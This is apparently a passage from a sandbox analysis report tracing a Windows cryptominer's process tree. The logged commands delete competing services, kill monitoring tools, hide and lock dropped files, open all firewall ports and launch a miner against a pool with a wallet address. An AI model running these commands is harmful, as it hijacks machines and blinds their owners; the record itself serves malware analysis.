- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete Microsoft_Update
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop "Help Service"
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete "Help Service"
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop vmicvess
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete vmicvess
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop SSDPSRVS
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete SSDPSRVS
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop superproservert
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete superproservert
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop Bcdefg
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete Bcdefg
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop ctfnom
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete ctfnom
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop ClipBooks
-
C:\Windows\SysWOW64\net.exe (depth 3)
net stop "MicrosoftFonts"
-
C:\Windows\SysWOW64\net1.exe (depth 4)
C:\Windows\system32\net1 stop "MicrosoftFonts"
-
C:\Windows\SysWOW64\net.exe (depth 3)
net stop MicrosoftFonts
-
C:\Windows\SysWOW64\net1.exe (depth 4)
C:\Windows\system32\net1 stop MicrosoftFonts
-
C:\Windows\SysWOW64\net.exe (depth 3)
net stop "Framework"
-
C:\Windows\SysWOW64\net1.exe (depth 4)
C:\Windows\system32\net1 stop "Framework"
-
C:\Windows\SysWOW64\net.exe (depth 3)
net stop Servicing
-
C:\Windows\SysWOW64\net1.exe (depth 4)
C:\Windows\system32\net1 stop Servicing
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop cefragsvc
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete cefragsvc
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop Microsoft.NET_Framework_NGEN
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete Microsoft.NET_Framework_NGEN
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop natiodnal
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete natiodnal
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop wbzxqk
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete wbzxqk
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop hidserv
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete hidserv
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop NetASDlogon
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete NetASDlogon
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop "BITS lsm"
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete "BITS lsm"
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop endpointrpc
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete endpointrpc
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop "MYSQL Input Service Name"
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete "MYSQL Input Service Name"
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete csrss
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop csrss
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop gupdate
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete gupdate
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop gupdatem
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete gupdatem
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop wmiApSrvs
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete wmiApSrvs
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop snmpstorsrv
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete snmpstorsrv
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete "MicrosoftFonts"
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop serviceing
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete Servicing
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete MicrosoftFonts
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop WmiAppSrv
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete WmiAppSrv
- Launches sc.exe
-
C:\Windows\SysWOW64\taskkill.exe (depth 3)
taskkill /f /t /im runhost.exe
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exe (depth 3)
taskkill /f /t /im rundllhost.exe
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exe (depth 3)
taskkill /f /t /im dlllhost.exe
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
C:\Windows\SysWOW64\cacls.exe (depth 3)
cacls C:\ProgramData\WmiAppSrv\svchost.exe /p everyone:n /d system
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
C:\Windows\SysWOW64\cacls.exe (depth 3)
cacls C:\ProgramData\Microsoft\WmiAppSrv\csrss.exe /p everyone:n /d system
-
C:\Windows\SysWOW64\Wbem\WMIC.exe (depth 3)
wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSrv\\svchost.exe'" call Terminate
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exe (depth 3)
wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe'" call Terminate
- Kills process with WMI
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
C:\Windows\SysWOW64\cacls.exe (depth 3)
cacls C:\Windows\system\lsmsm.exe /p everyone:n /d system
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
C:\Windows\SysWOW64\cacls.exe (depth 3)
cacls C:\Windows\mysql.log /p everyone:n /d system
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
C:\Windows\SysWOW64\cacls.exe (depth 3)
cacls C:\Windows\system\lsaus.exe /p everyone:n /d system
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
C:\Windows\SysWOW64\cacls.exe (depth 3)
cacls C:\Windows\srvany.exe /p everyone:n /d system
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
C:\Windows\SysWOW64\cacls.exe (depth 3)
cacls C:\Windows\splwow64.exe /d everyone
-
C:\Windows\SysWOW64\attrib.exe (depth 3)
attrib +s +h +r C:\Windows\svchost.exe
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
C:\Windows\SysWOW64\cacls.exe (depth 3)
cacls C:\Windows\svchost.exe /d everyone
-
C:\Windows\SysWOW64\taskkill.exe (depth 3)
taskkill /f /t /im tasksche.exe
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exe (depth 3)
attrib +s +h +r C:\Windows\tasksche.exe
- Sets file to hidden
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
C:\Windows\SysWOW64\cacls.exe (depth 3)
cacls C:\Windows\tasksche.exe /d everyone
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
C:\Windows\SysWOW64\cacls.exe (depth 3)
cacls C:\windows\help\csrss.exe /p everyone:n /d system
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
C:\Windows\SysWOW64\cacls.exe (depth 3)
cacls C:\windows\help\www.exe /p everyone:n /d system
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc config MpsSvc start= auto
-
C:\Windows\SysWOW64\net.exe (depth 3)
net start MpsSvc
-
C:\Windows\SysWOW64\net1.exe (depth 4)
C:\Windows\system32\net1 start MpsSvc
-
C:\Windows\SysWOW64\netsh.exe (depth 3)
netsh advfirewall set allprofiles state on
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exe (depth 3)
netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exe (depth 3)
netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exe (depth 3)
netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exe (depth 3)
netsh ipsec static add policy name=win
-
C:\Windows\SysWOW64\netsh.exe (depth 3)
netsh ipsec static add filterlist name=Allowlist
-
C:\Windows\SysWOW64\netsh.exe (depth 3)
netsh ipsec static add filterlist name=denylist
-
C:\Windows\SysWOW64\netsh.exe (depth 3)
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
-
C:\Windows\SysWOW64\netsh.exe (depth 3)
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
-
C:\Windows\SysWOW64\netsh.exe (depth 3)
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
-
C:\Windows\SysWOW64\netsh.exe (depth 3)
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
-
C:\Windows\SysWOW64\netsh.exe (depth 3)
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
-
C:\Windows\SysWOW64\netsh.exe (depth 3)
netsh ipsec static add filteraction name=Allow action=permit
-
C:\Windows\SysWOW64\netsh.exe (depth 3)
netsh ipsec static add filteraction name=deny action=block
-
C:\Windows\SysWOW64\netsh.exe (depth 3)
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
-
C:\Windows\SysWOW64\netsh.exe (depth 3)
netsh ipsec static set policy name=win assign=y
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
C:\Windows\system32\cmd.exe /S /D /c" ver "
-
C:\Windows\SysWOW64\find.exe (depth 3)
find "5.1."
-
C:\Windows\SysWOW64\WScript.exe (depth 2)
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"
- Deletes itself
-
\??\c:\windows\Fonts\svchost.exe (depth 1)
c:\windows\Fonts\svchost.exe
- Executes dropped EXE
-
\??\c:\windows\Fonts\lsass.exe (depth 2)
"c:\windows\Fonts\lsass.exe"
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c taskkill /im perfmon.exe /f /T
-
C:\Windows\SysWOW64\taskkill.exe (depth 4)
taskkill /im perfmon.exe /f /T
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c taskkill /im autoruns.exe /f /T
-
C:\Windows\SysWOW64\taskkill.exe (depth 4)
taskkill /im autoruns.exe /f /T
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c taskkill /im rundll32.exe /f /T
-
C:\Windows\SysWOW64\taskkill.exe (depth 4)
taskkill /im rundll32.exe /f /T
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c taskkill /im taskmgr.exe /f /T
-
C:\Windows\SysWOW64\taskkill.exe (depth 4)
taskkill /im taskmgr.exe /f /T
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib -s -h -r -a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c taskkill /im procexp.exe /f /T
-
C:\Windows\SysWOW64\taskkill.exe (depth 4)
taskkill /im procexp.exe /f /T
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c taskkill /im ProcessHacker.exe /f /T
-
C:\Windows\SysWOW64\taskkill.exe (depth 4)
taskkill /im ProcessHacker.exe /f /T
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib -s -h -r -a C:\Windows\Fonts
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
\??\c:\windows\Fonts\svchost.exe (depth 3)
c:\windows\Fonts\svchost.exe start Hostserver
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exe (depth 3)
c:\windows\Fonts\svchost.exe set Hostserver Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exe (depth 3)
c:\windows\Fonts\svchost.exe set Hostserver Security Accounts Services
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exe (depth 3)
c:\windows\Fonts\svchost.exe install Hostserver KvMonXP.exe -o stratum+tcp://l.f2pool.info:443 -u 47QrUBQ4ejMW5wrWXiKUyRcQCZszauGWg9c3SLkzFoBJi45M5yN6gVPjVxSUfjMq4u8vepEejdnxyRQcv4RuFGy25x67433 -p x -k --donate-level=1 --print-time=5 --nicehash
- Detected Stratum cryptominer command
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
\??\c:\windows\Fonts\svchost.exe (depth 3)
c:\windows\Fonts\svchost.exe start Hostserver
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exe (depth 3)
c:\windows\Fonts\svchost.exe set Hostserver Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exe (depth 3)
c:\windows\Fonts\svchost.exe set Hostserver Security Accounts Services
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exe (depth 3)
c:\windows\Fonts\svchost.exe install Hostserver KvMonXP.exe -o stratum+tcp://l.f2pool.info:443 -u 47QrUBQ4ejMW5wrWXiKUyRcQCZszauGWg9c3SLkzFoBJi45M5yN6gVPjVxSUfjMq4u8vepEejdnxyRQcv4RuFGy25x67433 -p x -k --donate-level=1 --print-time=5 --nicehash
- Detected Stratum cryptominer command
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib -s -h -r -a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
